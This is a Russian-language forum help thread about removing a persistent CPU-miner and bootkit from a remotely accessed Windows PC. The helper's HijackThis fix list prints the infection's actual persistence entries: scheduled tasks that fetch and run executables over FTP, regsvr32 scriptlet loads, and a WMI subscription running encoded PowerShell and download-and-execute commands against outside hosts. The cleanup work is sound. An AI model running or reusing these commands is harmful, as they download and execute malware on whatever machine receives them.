Убрать остатки остатки автозагружаемого обезвреженного CPU-майнера (conhost, lmsosee, mysa1-3)

Доброго времени суток.

Возникала проблема с компьютером на удалёнке, по аналогии с темами [URL="https://forum.kasperskyclub.ru/index.php?showtopic=61591"]здесь[/URL] и [URL="https://virusinfo.info/showthread.php?t=220307"]здесь[/URL].

На первых порах вирусня ликвидировала беззащитный бесплатный avast, службы создания точек отката и убрала возможность установить антивирус в принципе, не говоря о том, что в фоне создавала серьезную нагрузку на ЦП.

Ликвидировать при при помощи cureIT/KVRT было бесполезно - восстановление вируса происходило после очередного перезапуска (через автозагрузку, реестр, планировщик коннектится к ftp за скриптом-установщиком вирусни). Чудным образом удалось восстановить Центр Обновления Windows и накатить заплатку, через которую осуществлялся майнинг. Загрузка на ЦП пропала, однако остались всё также в планировщике, реестре и автозагрузке строки коннектов к ftp, которые при помощи доверенных утилит с различных форумов помощи были тоже стерты, но, сдается мне, что не все строки вручную удалось обнаружить собственными силами, так как всё равно появляются conhost, lsmosee, mysa1-3 в тех же самых местах.

Дабы не использовать автоматические скрипты по удалению, предназначенные для других пользователей, создаю свою тему.
Напомню только, что единственный доступ к компьютеру - удалённый.

Уважаемый(ая) [B]ramzeka[/B], спасибо за обращение на наш форум!

Помощь при заражении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в [URL="https://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].

[INFORMATION]Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом [URL="https://virusinfo.info/content.php?r=613-sub_pomogite"]Помогите+[/URL].[/INFORMATION]

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста [URL="https://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].

Анализ провел, логи прикрепил.

Запустите HijackThis, расположенный в папке Autologger и [url="http://virusinfo.info/showthread.php?t=4491"]пофиксите[/url] (в [B]Windows Vista/7/8/10[/B] необходимо запускать через правую кнопку мыши [B]Запуск от имени администратора)[/B]):[code]O4 - HKLM\..\Run: [start] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.1226bye.xyz:280/v.sct scrobj.dll
O7 - IPSec: Name: win (2019/01/17) - {aa8de756-2896-49df-81a9-b0ec1480a4ca} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2019/01/17) - {aa8de756-2896-49df-81a9-b0ec1480a4ca} - Source: Any IP - Destination: my IP (Port 137 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2019/01/17) - {aa8de756-2896-49df-81a9-b0ec1480a4ca} - Source: Any IP - Destination: my IP (Port 138 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2019/01/17) - {aa8de756-2896-49df-81a9-b0ec1480a4ca} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2019/01/17) - {aa8de756-2896-49df-81a9-b0ec1480a4ca} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block
O22 - Task: Mysa - C:\Windows\system32\cmd.exe /c echo open ftp.1226bye.xyz>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe
O22 - Task: Mysa1 - C:\Windows\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
O22 - Task: Mysa2 - C:\Windows\system32\cmd.exe /c echo open ftp.1226bye.xyz>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p
O22 - Task: Mysa3 - C:\Windows\system32\cmd.exe /c echo open ftp.1226bye.xyz>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe
O25 - WMI Event: fuckyoumm4 - fuckyoumm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'", cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA=="&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:http://wmi.1217bye.host/1.txt scrobj.dll&regsvr32 /u /s /i:http://173.208.139.170/2.txt scrobj.dll&regsvr32 /u /s /i:http://35.182.171.137/3.txt scrobj.dll[/code]
Скачайте и запустите TDSSKiller: [url]http://support.kaspersky.ru/viruses/disinfection/5350[/url].
Файл C:\TDSSKiller.***_log.txt приложите в теме.
(где *** - версия программы, дата и время запуска.)

При помощи Autologger пофиксил.
TDSKiller'ом прогнал. Логи во вложении.

После перезагрузки вновь хватает Rootkit.Boot.DarkGalaxy.a:
16:38:16.0757 0x0524 \Device\Harddisk0\DR0\# - copied to quarantine
16:38:16.0757 0x0524 \Device\Harddisk0\DR0 - copied to quarantine
16:38:16.0822 0x0524 \Device\Harddisk0\DR0 ( Rootkit.Boot.DarkGalaxy.a ) - will be cured on reboot
16:38:16.0827 0x0524 \Device\Harddisk0\DR0 - ok
16:38:16.0827 0x0524 \Device\Harddisk0\DR0 ( Rootkit.Boot.DarkGalaxy.a ) - User select action: Cure
16:38:17.0027 0x0524 KLMD registered as C:\Windows\system32\drivers\39541415.sys

Не может MBR-ку изменить, либо после ребута что-то меняет её по новой.

Скачайте утилиту Universal Virus Sniffer [URL="https://yadi.sk/d/6A65LkI1WEuqC"]отсюда[/URL] и [url=https://virusinfo.info/showthread.php?t=121767&p=897810&viewfull=1#post897810]сделайте полный образ автозапуска uVS[/url].
Если образ не влезет во вложения - загрузите в доступное облачное хранилище или на файлообменник (желательно, без капчи и излишней рекламы) и дайте ссылку.

Затем лечите TDSSKiller'ом без подключения в интернет,пофиксите снова в HijackThis всё, что будет из сообщения #4.
По возможности не подключайтесь к интернету на проблемной машине до полного излечения. Не получится - дам рекомендации по UVS по образу автозапуска.

[QUOTE=Vvvyg;1495070]Скачайте утилиту Universal Virus Sniffer [URL="https://yadi.sk/d/6A65LkI1WEuqC"]отсюда[/URL] и [URL="https://virusinfo.info/showthread.php?t=121767&p=897810&viewfull=1#post897810"]сделайте полный образ автозапуска uVS[/URL].
Если образ не влезет во вложения - загрузите в доступное облачное хранилище или на файлообменник (желательно, без капчи и излишней рекламы) и дайте ссылку.
[/QUOTE]
Как раз uVS'ом и пользовался в прошлый раз, но, видимо, что-то еще осталось.
Ссылка на образ: [URL="https://dropmefiles.com/aSVEP"]DropMeFiles[/URL]

[QUOTE=Vvvyg;1495070]
Затем лечите TDSSKiller'ом без подключения в интернет,пофиксите снова в HijackThis всё, что будет из сообщения #4.
По возможности не подключайтесь к интернету на проблемной машине до полного излечения. Не получится - дам рекомендации по UVS по образу автозапуска.[/QUOTE]

Сделаю, конечно, но машина на удалёнке, повторюсь, поэтому пока что не получится без интернета.

Тогда печально... Там, похоже, буткит подгружает прочие компоненты и наоборот.
Попробуйте пролечить KVRT, может, справится.

[QUOTE=Vvvyg;1495103]Тогда печально... Там, похоже, буткит подгружает прочие компоненты и наоборот.
Попробуйте пролечить KVRT, может, справится.[/QUOTE]

Ну что ж, после вышеописанных действий (TDSKiller+uVS+HiJackThis) полёт нормальный.

После перезагрузки [B]TDSKiller[/B] ничего не нашел.
[B]uVS[/B] нашел строчку на подозрительный драйвер, но без самого файла.
[B]HiJackThis[/B] больше не находит те строки, которые вы сказали удалить.

Сейчас проведу полную проверку [B]KVRT [/B]и сообщу о результатах. Затем, проверю пропал ли запрет на установку антивирусного ПО.

[COLOR="silver"]- - - - -Добавлено - - - - -[/COLOR]
[b]Vvvyg[/b],
Провел сканирование, [B]KVRT[/B] обнаружил еще 59 угроз (в том числе даже находящиеся в карантинных папках [B]uVS/Hijack[/B]). После перезагрузки всё также ничего постороннего не находит более. Антивирус установился, проблем более нет.
Заявку можно считать закрытой.
Благодарю за помощь.

Всё-таки образ автозапуска UVS хотелось бы посмотреть, возможно ещё хвосты остались.